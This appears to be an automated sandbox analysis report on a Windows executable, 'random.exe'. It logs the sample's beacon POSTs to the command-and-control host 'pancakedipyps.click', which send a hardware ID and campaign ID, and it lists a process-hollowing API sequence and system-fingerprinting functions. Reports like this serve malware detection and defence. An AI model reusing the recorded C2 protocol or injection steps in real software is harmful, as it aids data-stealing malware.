2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: ac 82 f8 cd 49 7e 30 c2 b7 4a ba 33 71 74 a3 2f 23 e7 3f d7 f2 bb 8c e0 62 d6 cd bb 06 73 11 f3 4a 77 b8 39 82 83 05 5f 76 a7 fd 30 b9 6f b7 e1 bd 58 da 96 a6 94 d2 1a 5a 53 e1 72 e9 d2 e6 26 9b c5 b9 1f 6f c6 d1 67 1c 9d 5b b6 08 9c 90 82 7b 2d 24 ba 01 35 46 e2 7f c1 63 36 b8 9c f9 98 c0 b2 1c 39 12 c9 99 2d 9f 70 75 19 9c 29 5f ee 5e e1 20 15 15 43 ca d8 2c 94 16 96 36 99 f2 d4 bf 64 41 09 b7 a6 29 10 83 b1 e4 23 f1 59 96 36 11 24 09 59 bf 08 e7 06 90 7a 15 5b 3b 2c 2a dc 7f 2f 28 b4 56 52 8e 10 12 8b be 31 e2 08 32 9a 1b 9c 73 c0 66 68 04 da 75 ad 16 e6 7d c9 b8 84 c5 c7 bf 7f 2c 08 0f 0b 42 7f d2 e8 ee c1 9f 85 18 ab fe 33 5b 13 fe a7 aa f8 82 cf f4 04 34 dd fa 96 36 f2 df 97 89 0d cd d6 03 43 dc 91 63 af c0 e2 d8 08 43 66 61 a5 ca f9 8b 64 95 73 0f Data Ascii: I~0J3qt/#?bsJw9_v0oXZSr&og[{-$5Fc69-pu)_^ C,6dA)#Y6$Yz[;,*/(VR12sfhu},B3[46CcCfads
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: ba 82 be d6 30 c1 ca ee 19 9b 7a fb b6 75 c7 53 bf fe d4 d5 fe bd 2d c8 2e 7f 81 47 14 1d 79 33 21 e4 dd 08 ca eb d2 e8 a4 e5 1b 61 70 12 da ab 35 6d f4 59 75 8a 50 c0 c2 b7 0c ca cc c2 2e 4c 8d 13 f9 26 6a 17 ea db 2a 4d 8e b0 ec 4f bd 06 bc 7e 24 ec 8f e0 e7 18 a0 9b 0b 2d a3 18 9c b2 3c b4 0b 5f 7e 82 9a c7 c6 40 3e 95 c8 26 45 57 dd 45 db d1 b3 8d 00 0e 2b b5 8d 14 db 9d b2 8b a7 da 2a 38 5a 82 35 c0 42 bf d6 5f bc 72 d9 4f 3b ba ee f6 10 19 96 6f 80 30 78 bc 90 e2 e5 b7 2a ca f7 1a ec 75 67 76 ad bd 50 15 7a 6c ac 73 3f 2a fd 02 eb 08 52 75 56 03 9f ba 6e 9b b7 f1 cc 0f 6f d3 cd 8f 53 3d 9f c7 52 3c fc de 15 d0 32 70 06 8b e3 23 1b 27 f8 ad 3f 86 d1 ba 24 4c be 7f 13 6b 65 77 46 13 ca f8 7c d6 f5 f5 78 84 49 53 34 f3 51 73 2e 1c 15 55 a2 5c e8 ff 49 Data Ascii: 0zuS-.Gy3!ap5mYuP.L&jMO~$-<_~@>&EWE+8Z5B_rO;o0xugvPzls?RuVnoS=R<2p#'?$LkewF\|xIS4Qs.U\I
2025-01-08 10:47:06 UTC	15331	OUT	Data Raw: 81 2c 2b 65 30 b3 75 c6 d0 46 f5 14 19 99 e6 d0 46 45 8d f2 5c 33 61 4e ab 9b 76 fe d9 6f 7d 49 a8 36 89 e2 34 19 41 29 c3 bc 12 71 c8 bb 4c ae 0d 93 85 b6 c8 7c aa 14 02 22 76 45 81 84 a3 2c ce ba ff 18 91 dd 17 d3 1e 5a 8a 6b ae 0b c8 7f c5 40 e7 ec 52 2c ff 77 9c 94 fd 51 69 ed 9b 1c ed db f2 e9 01 b6 88 72 04 83 3c ff eb 22 ae 30 d9 8a 59 e3 dd 8f 52 dd d3 1f 52 24 dd a7 3b b5 cc 72 a8 cb 8a b4 af 7d a7 52 4e 60 fd c8 4c 29 2d 3a 4f 6c fa 56 de ad 1c 56 e8 a7 2d d9 ff 4e 98 39 31 bf 1d 90 9c 62 43 71 5f 2d 4e 85 0f fc eb 65 b0 67 f9 43 dd ec 8b d9 c8 f7 d2 8d 5e e1 2f 17 ab f5 66 dc 95 67 2d ff 41 9f fd 07 ed 1a 21 35 5b 2d da b1 f6 8d d5 37 53 9a f6 b1 2f e0 89 74 61 de 74 cc b1 5b 27 5d 82 f6 ba 9d 57 b4 12 e8 00 37 ed 32 34 d4 8f 9e 0b da 3e 68 b6 Data Ascii: ,+e0uFFE\3aNvo}I64A)qL\|"vE,Zk@R,wQir<"0YRR$;r}RN`L)-:OlVV-N91bCq_-NegC^/fg-A!5[-7S/tat[']W724>h
2025-01-08 10:47:09 UTC	1139	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:47:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=slku24d5celfbslg354674j54m; expires=Sun, 04 May 2025 04:33:46 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SwUhZpOSYIBbDcbbn2sprKI%2B%2FJllR0%2BrqkS44uDQGZ%2FG0xt20FCs0vcyv%2BlfbtYwmpL1FuB%2FmdT7CGsQcJ0iY0pHbk1YLpMKgIB7wDiclJtsa0TXtjebOEv2igv2tLi8MJPezKlc"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb9b890a724216-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1710&min_rtt=1706&rtt_var=649&sent=203&recv=602&lost=0&retrans=0&sent_bytes=2848&recv_bytes=586618&delivery_rate=1675272&cwnd=250&unsent_bytes=0&cid=7caeec3ac7a624bf&ts=3595&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49749	188.114.97.3	443	6940	C:\Users\user\Desktop\random.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 10:47:10 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 81 Host: pancakedipyps.click
2025-01-08 10:47:10 UTC	81	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 46 41 54 45 39 39 2d 2d 74 65 73 74 26 6a 3d 26 68 77 69 64 3d 31 32 46 35 39 32 37 31 37 39 44 30 46 44 44 32 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 Data Ascii: act=get_message&ver=4.0&lid=FATE99--test&j=&hwid=12F5927179D0FDD2822D1F4978021086
2025-01-08 10:47:10 UTC	1125	IN	HTTP/1.1 200 OK Date: Wed, 08 Jan 2025 10:47:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=hs2o5v4vks7665d3raa4jk71rf; expires=Sun, 04 May 2025 04:33:49 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0pUIAokG2JBggOxduailvC2aJkDODm3vNcbwdZbMYg3PGGvKl%2BjTTYhLvUBaM3%2BCiwRSX278T0NP6KNNlwzh9KyLSI%2Ft6RClc6my4s3azo78L23rPavuuwBQecVDMnon4pD87hT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8feb9ba2ad98efa1-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2014&min_rtt=2006&rtt_var=768&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=984&delivery_rate=1410628&cwnd=165&unsent_bytes=0&cid=5690c22e8a0fa9bd&ts=501&x=0"
2025-01-08 10:47:10 UTC	54	IN	Data Raw: 33 30 0d 0a 65 48 30 6a 78 75 7a 75 38 4e 45 48 4d 6f 4a 63 4d 5a 4f 50 4e 6d 46 75 66 6d 6f 70 75 68 32 65 62 65 67 6a 79 50 42 41 73 6b 45 6a 49 41 3d 3d 0d 0a Data Ascii: 30eH0jxuzu8NEHMoJcMZOPNmFufmopuh2ebegjyPBAskEjIA==
2025-01-08 10:47:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	05:46:55
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\random.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random.exe"
Imagebase:	0xb90000
File size:	349'696 bytes
MD5 hash:	6446A00EB59754E15749AF229B0D5217
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:46:55
Start date:	08/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:46:55
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\random.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\random.exe"
Imagebase:	0x290000
File size:	349'696 bytes
MD5 hash:	6446A00EB59754E15749AF229B0D5217
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	05:46:55
Start date:	08/01/2025
Path:	C:\Users\user\Desktop\random.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\random.exe"
Imagebase:	0x560000
File size:	349'696 bytes
MD5 hash:	6446A00EB59754E15749AF229B0D5217
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:46:55
Start date:	08/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6732 -s 140
Imagebase:	0x4e0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	8.4%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	47.4%
Total number of Nodes:	19
Total number of Limit Nodes:	1

Executed Functions

Function 03087F19 Relevance: 42.3, APIs: 11, Strings: 13, Instructions: 294
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03087E8B,03087E7B), ref: 030880B1
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 030880C4
Wow64GetThreadContext.KERNEL32(00000394,00000000), ref: 030880E2
ReadProcessMemory.KERNELBASE(00000398,?,03087ECF,00000004,00000000), ref: 03088106
VirtualAllocEx.KERNELBASE(00000398,?,?,00003000,00000040), ref: 03088131
TerminateProcess.KERNELBASE(00000398,00000000), ref: 03088150
WriteProcessMemory.KERNELBASE(00000398,00000000,?,?,00000000,?), ref: 03088189
WriteProcessMemory.KERNELBASE(00000398,00400000,?,?,00000000,?,00000028), ref: 030881D4
WriteProcessMemory.KERNELBASE(00000398,?,?,00000004,00000000), ref: 03088212
Wow64SetThreadContext.KERNEL32(00000394,02FB0000), ref: 0308824E
ResumeThread.KERNELBASE(00000394), ref: 0308825D

Strings

VirtualAlloc, xrefs: 03087FE0
WriteProcessMemory, xrefs: 0308802C
ress, xrefs: 03087FA3
GetThreadContext, xrefs: 03087FF3
aryA, xrefs: 03087F5F
SetThreadContext, xrefs: 0308803F
VirtualAllocEx, xrefs: 03088019
GetP, xrefs: 03087F9B
ResumeThread, xrefs: 03088055
ReadProcessMemory, xrefs: 03088006
Load, xrefs: 03087F57
TerminateProcess, xrefs: 03088140
CreateProcessW, xrefs: 03087FCD

Memory Dump Source

Source File: 00000000.00000002.1783938236.0000000003087000.00000040.00000800.00020000.00000000.sdmp, Offset: 03087000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3087000_random.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-232383841
Opcode ID: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction ID: ed4969dec054787ee7e0faf6ed5689c1519e436ac3dd8468a7e1e361a65a61c4
Opcode Fuzzy Hash: 956aea2136c6b0205ab5bf3fe1e0123e9091b05b22cf94d50ecc47fa332fbd9d
Instruction Fuzzy Hash: 3FB1187660124AAFDB60CF68CC80BDA77A5FF88714F158564EA1CAB341C770FA41CB94

Function 03088096 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 82
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,03087E8B,03087E7B), ref: 030880B1
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 030880C4
Wow64GetThreadContext.KERNEL32(00000394,00000000), ref: 030880E2
ReadProcessMemory.KERNELBASE(00000398,?,03087ECF,00000004,00000000), ref: 03088106
VirtualAllocEx.KERNELBASE(00000398,?,?,00003000,00000040), ref: 03088131
TerminateProcess.KERNELBASE(00000398,00000000), ref: 03088150
WriteProcessMemory.KERNELBASE(00000398,00000000,?,?,00000000,?), ref: 03088189
WriteProcessMemory.KERNELBASE(00000398,00400000,?,?,00000000,?,00000028), ref: 030881D4
WriteProcessMemory.KERNELBASE(00000398,?,?,00000004,00000000), ref: 03088212
Wow64SetThreadContext.KERNEL32(00000394,02FB0000), ref: 0308824E
ResumeThread.KERNELBASE(00000394), ref: 0308825D

Strings

TerminateProcess, xrefs: 03088140

Memory Dump Source

Source File: 00000000.00000002.1783938236.0000000003087000.00000040.00000800.00020000.00000000.sdmp, Offset: 03087000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3087000_random.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: TerminateProcess
API String ID: 2440066154-2873147277
Opcode ID: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction ID: 8e8f65f6ff411d22d2554d0807335a692ee7538b1ceaef13d1d19e48fa5cdcd4
Opcode Fuzzy Hash: 366357b1f1c2220b0d4ba716667a9fb5a6f16c59ad58adbe506062085bfa29f6
Instruction Fuzzy Hash: F2312E72240646ABDB74CF54CC91FEA73A5BFC8B15F148508FB09AF781C6B4BA018B94

Function 02E629D7 Relevance: 1.6, APIs: 1, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(04083588,?,?,?,?,?,?,?,?,00B959C4,00000000,?,02E60CBE,?,00000040), ref: 02E62A69

Memory Dump Source

Source File: 00000000.00000002.1783761117.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_random.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b30de076889174bc126f3ecc6a7cecadb6216446618caf57ac5666fb407f299d
Instruction ID: 0b92dc874e22d2d4f2e9821551e2ee2f9d60e3c61e7a8b2d7b1f2caf57db7fba
Opcode Fuzzy Hash: b30de076889174bc126f3ecc6a7cecadb6216446618caf57ac5666fb407f299d
Instruction Fuzzy Hash: E12145B19053989FCB01CFA9C884ADEFFB0FF09310F14816AE948A7251C3786944CBA1

Function 02E60668 Relevance: 1.6, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(04083588,?,?,?,?,?,?,?,?,00B959C4,00000000,?,02E60CBE,?,00000040), ref: 02E62A69

Memory Dump Source

Source File: 00000000.00000002.1783761117.0000000002E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_random.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 9cf1f595afc8db39cfeae544992d1146611aa885699f87ead59c9aef4cf9be6d
Instruction ID: a16fce51918e8325d1c20c3693a868f63782a83d1873fb47c074add31d32c88d
Opcode Fuzzy Hash: 9cf1f595afc8db39cfeae544992d1146611aa885699f87ead59c9aef4cf9be6d
Instruction Fuzzy Hash: 4A21F2B5900659AFCB00DF9AC884ADEFBB4FB48314F10812AE918A7200C3B5A954CFA5

Analysis Process: random.exePID: 6940, Parent PID: 6732COMMON

Execution Graph

Execution Coverage:	7.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	48.7%
Total number of Nodes:	189
Total number of Limit Nodes:	14

Executed Functions

Function 0043D0D0 Relevance: 32.5, APIs: 11, Strings: 7, Instructions: 957
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
SysAllocString.OLEAUT32 ref: 0043D608
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
SysAllocString.OLEAUT32 ref: 0043D6A8
SysAllocString.OLEAUT32 ref: 0043D765
VariantInit.OLEAUT32(?), ref: 0043D7D6
SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95

Strings

[B, xrefs: 0043D225
CfF, xrefs: 0043D600
{pqv, xrefs: 0043D120
[J, xrefs: 0043D21D
tu, xrefs: 0043D5AC
yv, xrefs: 0043D813
fF, xrefs: 0043D5D0

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: fF$CfF$[B$[J$tu$yv${pqv
API String ID: 505850577-1972840126
Opcode ID: 3ddc2ead7565efc33bb403abcee38b0898e8d98e79c6cb4a9a4b1927beae507d
Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
Opcode Fuzzy Hash: 3ddc2ead7565efc33bb403abcee38b0898e8d98e79c6cb4a9a4b1927beae507d
Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

Function 0040E16E Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 345
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 0040E17A

Strings

RYZ[, xrefs: 0040E52E
c[i!, xrefs: 0040E2CB
pancakedipyps.click, xrefs: 0040E631
yD, xrefs: 0040E29A
UGC9, xrefs: 0040E2E1
Zb, xrefs: 0040E188

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: Uninitialize
String ID: RYZ[$UGC9$Zb$c[i!$pancakedipyps.click$yD
API String ID: 3861434553-3553024370
Opcode ID: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction ID: 966cdb19ca8ac249a37a340b6d4c56d028db331cb6ce3dd003334f0be9ec8841
Opcode Fuzzy Hash: 9bb15100d4bb6a15a77dc5872525b3ecedab199ceaceba36afab7cc08321f92a
Instruction Fuzzy Hash: C3C1FF7150C3D08BDB348F2598687ABBBE1AFD2304F084D6DD8D95B286D678450A8B96

Function 00421B30 Relevance: 9.3, Strings: 7, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0, xrefs: 00421DF2
p, xrefs: 00422161
,, xrefs: 00422090
v, xrefs: 00422159
6, xrefs: 00421E02
q, xrefs: 00422169
!@, xrefs: 00421B6A

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$0$6$p$q$v
API String ID: 1279760036-585546663
Opcode ID: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
Instruction ID: 8656d014051cfeae6f38fc6e5bc27d53fcdcc23dc9b32e8d9396b3c6709607b7
Opcode Fuzzy Hash: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
Instruction Fuzzy Hash: 0122DD7170C790CFD3248B28D58036BBBE1BB95324F558A2EE5E9873D1D7B988418B4B

Function 00408A60 Relevance: 7.7, APIs: 5, Instructions: 216
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408A84
GetCurrentThreadId.KERNEL32 ref: 00408A8E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
GetForegroundWindow.USER32 ref: 00408B8B
ExitProcess.KERNEL32 ref: 00408D07

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID:
API String ID: 4063528623-0
Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

Function 0042F716 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 366
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042FC65

Strings

Tx+, xrefs: 0042FD77
bC, xrefs: 0042FD1D
5, xrefs: 0042FC83

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 5$Tx+$bC
API String ID: 3960555810-2958649183
Opcode ID: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
Instruction ID: 57781aab13a08c1a066b8e14d20b5adcd793598ba32206fb76d556f76c65c1e4
Opcode Fuzzy Hash: bd69bc838739ae90d4b0a58172e55ce76a86b20f4efd0bead3c1e9785a5287de
Instruction Fuzzy Hash: 66B1C17050C3918AE7358F2990643ABFFE0AF93304F98496ED5C987392D7794409CB56

Function 0042FB7D Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 327
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042FC65

Strings

Tx+, xrefs: 0042FD77
bC, xrefs: 0042FD1D
5, xrefs: 0042FC83

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: InstalledMemoryPhysicallySystem
String ID: 5$Tx+$bC
API String ID: 3960555810-2958649183
Opcode ID: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
Instruction ID: c6dbd191573f8eaa778921652fb4887c0da57f4868ba9d7cab245032b22be67a
Opcode Fuzzy Hash: b019f8faa7078be6aa673cad719c14887d56416cdb44293ea95d0146935d494c
Instruction Fuzzy Hash: D0A1C17050C3918AE739CF2994603EBBFE0AF96304F58897ED5C987392D7794409CB56

Function 0040C080 Relevance: 6.4, Strings: 5, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

DM_e, xrefs: 0040C083
FwPq, xrefs: 0040C0B9
'!, xrefs: 0040C119
Js, xrefs: 0040C0C1
50, xrefs: 0040C1AD

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: 50$DM_e$FwPq$Js$'!
API String ID: 0-1711485358
Opcode ID: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction ID: a29f9b67a002a0f45ebf0d2c5d73cf8b9506a9b5be0e3ba76b97c1ae1caaee17
Opcode Fuzzy Hash: c4c1f8e28e835abe653d42ead9130a3bdb40cd1f355abcf11e9a7fb6b3c4c5b3
Instruction Fuzzy Hash: C751DAB45493808FE334CF21C991B8BBBB1BBA1304F609A0CE6D95B654CB759446CF97

Function 00425713 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 346
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00425743

Strings

67, xrefs: 00425B0C

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 67
API String ID: 237503144-1886922373
Opcode ID: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
Instruction ID: 69054aec17b57e4c885244c43c85c7a2a523591f4f2f134b8c84ae4bc1ca1ac0
Opcode Fuzzy Hash: e3d5ee6a10ef3cb590ca084e24df21bec85322a84b333c3760c72d733834ca72
Instruction Fuzzy Hash: 6EB1A9B4508710CBD7109F54E88176BBBE0FF86708F44496EE9849B391E7B9C949CB8B

Function 00437C10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00437C52
GetSystemMetrics.USER32 ref: 00437C62

Strings

, xrefs: 00437D4F

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
Instruction ID: 45907af0f9aaa3a0b9b12b1f6695193350465b50a920b4478e3ecda7c38bd9fb
Opcode Fuzzy Hash: 12748a352a6113057c12441240e5b0ee108c97012b660969c1fdd4a02f1b159c
Instruction Fuzzy Hash: 23C15BB05093808BE7B0DF64D99979BFBF1BB85308F10992EE5984B354C7B89449CF4A

Function 00418BA2 Relevance: 5.4, Strings: 4, Instructions: 367
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

oQ, xrefs: 00418BD2
bd\,, xrefs: 00418BB1
fnga, xrefs: 00418BBC
PWPQ, xrefs: 00418BC7

Memory Dump Source

Source File: 00000003.00000002.1796791982.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_random.jbxd

Similarity

API ID:
String ID: PWPQ$bd\,$fnga$oQ
API String ID: 0-3706350231
Opcode ID: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
Instruction ID: e34152e6636813154928bb160b9fd2834c9c91dba41fdab838839377217cf8bd
Opcode Fuzzy Hash: fe0c42c07420c9bbc5d61f49a80fd29d9882301a9105f023342265155b572c4c
Instruction Fuzzy Hash: 1CC126766083408FD7258F24C8557AB77E6EFC6314F08892EE8998B391EF388841C787

